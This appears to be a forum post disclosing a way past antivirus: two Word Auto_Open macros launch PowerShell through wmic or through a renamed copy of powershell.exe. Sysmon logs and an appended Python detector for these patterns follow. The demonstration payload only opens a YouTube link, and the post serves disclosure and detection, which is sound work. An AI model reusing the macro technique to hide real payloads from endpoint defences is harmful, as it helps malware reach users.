Found a way to bypass a well-known Enterprise AV solution a while ago. I'm afraid to disclose it to anyone other than the vendor. I disclosed it to that particular vendor, and they haven't quite solved the problem, yet. I don't want to cause anyone any undue hardship from disclosing this particular vulnerability, but it's probably already well-known. The difficulty in solving this is that the way to bypass this AV uses Windows built-in tools and it produces a lot of false positives. This vendor thought that they had a solution in a signature update, but it didn't cover the wide variety of ways that this particular Windows built-in tool could be used. I'm horrified by this, but not exactly surprised. This is why defense in depth is so vitally important. Where one solution fails, another will succeed. I wish I could say more. I can't quite figure out how it works. I'm scratching my head because it shouldn't work. I put protections in place by making custom rules, and it's not firing on any of the custom rules even though it should. Thought I had an idea of why. That was proven to be wrong. Wish I could figure this out because if I found it, I'm fairly certain the bad guys have probably already found it. I guess I can release the exploit. Someone will figure out who the vendor is. I just hope that by releasing this, a fix can be made. Some of you will say, "Well, Emotet does that..." You're right - but does it do it in this exact way? Emotet was what inspired me to try this. And yes, I know, this isn't l33t.
Create a macro in Word and add this technique:
Sub Auto_Open()
'
' Auto_Open Macro
'
'
Shell ("wmic process call create 'powershell.exe chrome.exe https://www.youtube.com/watch?v=dQw4w9WgXcQ'")
End Sub
Here's another one bypassing a custom rule telling my AV solution not to allow winword.exe to run powershell.exe, by copying powershell.exe to my Desktop and renaming it to dog.exe:
Sub Auto_Open()
'
' Auto_Open Macro
'
'
Shell ("C:\Users\Bob\Desktop\dog.exe Start-Process chrome.exe 'https://www.youtube.com/watch?v=dQw4w9WgXcQ'")
End Sub
Showing these as well (Sysmon process-creation events from the Windows event log) to help detect this.
Process Create:
UtcTime: 2019-09-23 20:47:36.217
ProcessGuid: {}
ProcessId: 22412
Image: C:\Program Files (x86)\Microsoft Office\Officex\WINWORD.EXE
CommandLine: "C:\Program Files (x86)\Microsoft Office\Officex\WINWORD.EXE" /n "C:\Users\BOB\Downloads\Bob.docm" /o ""
CurrentDirectory: C:\WINDOWS\system32\
User: BOB\BOB
LogonGuid: {}
LogonId:
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA1=
ParentProcessGuid: {}
ParentProcessId: 7088
ParentImage: C:\Windows\explorer.exe
ParentCommandLine: "C:\Windows\explorer.exe" /LOADSAVEDWINDOW
Process Create:
UtcTime: 2019-09-23 20:47:39.828
ProcessGuid: {}
ProcessId: 1136
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
CommandLine: powershell.exe Start-Process chrome.exe https://youtu.be/dQw4w9WgXcQ
CurrentDirectory: c:\windows\system32\spool\drivers\x64\3\
User: BOB\BOB
LogonGuid: {}
LogonId:
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA1=
ParentProcessGuid: {}
ParentProcessId: 6868
ParentImage: C:\Windows\System32\wbem\WmiPrvSE.exe
ParentCommandLine: C:\WINDOWS\system32\wbem\wmiprvse.exe -secured -Embedding
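The detection these events point to, as an added example that is not the post's own code: a small Python checker that parses Sysmon Event ID 1 text into records and flags the three patterns the two macros produce (an Office process spawning wmic/powershell/cmd, a shell whose parent is WmiPrvSE.exe, and PowerShell syntax on the command line of a binary not named powershell.exe, the renamed-copy case). The sample input is constructed: the powershell.exe event from the post plus two hypothetical events implied by the macros; the rule names and the renamed-binary heuristic are my own.

```python
# Sysmon Event ID 1 text, constructed for this example: the powershell.exe
# event from the post plus two hypothetical events implied by the two macros.
SAMPLE_EVENTS = """\
Process Create:
Image: C:\\Windows\\System32\\wbem\\WMIC.exe
CommandLine: wmic process call create 'powershell.exe chrome.exe https://youtu.be/dQw4w9WgXcQ'
ParentImage: C:\\Program Files (x86)\\Microsoft Office\\Officex\\WINWORD.EXE
Process Create:
Image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
CommandLine: powershell.exe Start-Process chrome.exe https://youtu.be/dQw4w9WgXcQ
ParentImage: C:\\Windows\\System32\\wbem\\WmiPrvSE.exe
Process Create:
Image: C:\\Users\\Bob\\Desktop\\dog.exe
CommandLine: C:\\Users\\Bob\\Desktop\\dog.exe Start-Process chrome.exe 'https://youtu.be/dQw4w9WgXcQ'
ParentImage: C:\\Program Files (x86)\\Microsoft Office\\Officex\\WINWORD.EXE
"""
OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}
SHELLS = {"wmic.exe", "powershell.exe", "pwsh.exe", "cmd.exe"}
PS_TOKENS = ("start-process", "invoke-expression", "-encodedcommand", "iex ")

def parse_sysmon_text(text):
    """Split Sysmon's text output into one dict per 'Process Create:' block."""
    events, current = [], None
    for line in text.splitlines():
        if line.strip() == "Process Create:":
            current = {}
            events.append(current)
        elif current is not None and ": " in line:
            key, _, value = line.partition(": ")
            current[key.strip()] = value.strip()
    return events

def evaluate(event):
    """Return the names of the detection rules this event trips ([] = clean)."""
    image = event.get("Image", "").rsplit("\\", 1)[-1].lower()
    parent = event.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    cmd = event.get("CommandLine", "").lower()
    hits = []
    if parent in OFFICE and image in SHELLS:          # Word -> wmic (first macro)
        hits.append("office_spawns_shell")
    if parent == "wmiprvse.exe" and image in SHELLS:  # WMI-created shell, Office parent hidden
        hits.append("wmiprvse_spawns_shell")
    # Heuristic for the renamed copy: PowerShell syntax from an image not named powershell/pwsh
    if image not in {"powershell.exe", "pwsh.exe"} and any(t in cmd for t in PS_TOKENS):
        hits.append("renamed_powershell")
    return hits

def scan(text):
    return {e["Image"].rsplit("\\", 1)[-1]: evaluate(e)
            for e in parse_sysmon_text(text) if evaluate(e)}
```

The third rule is a heuristic; on hosts where Sysmon also logs OriginalFileName, matching that field against powershell.exe is the more robust check for a renamed copy.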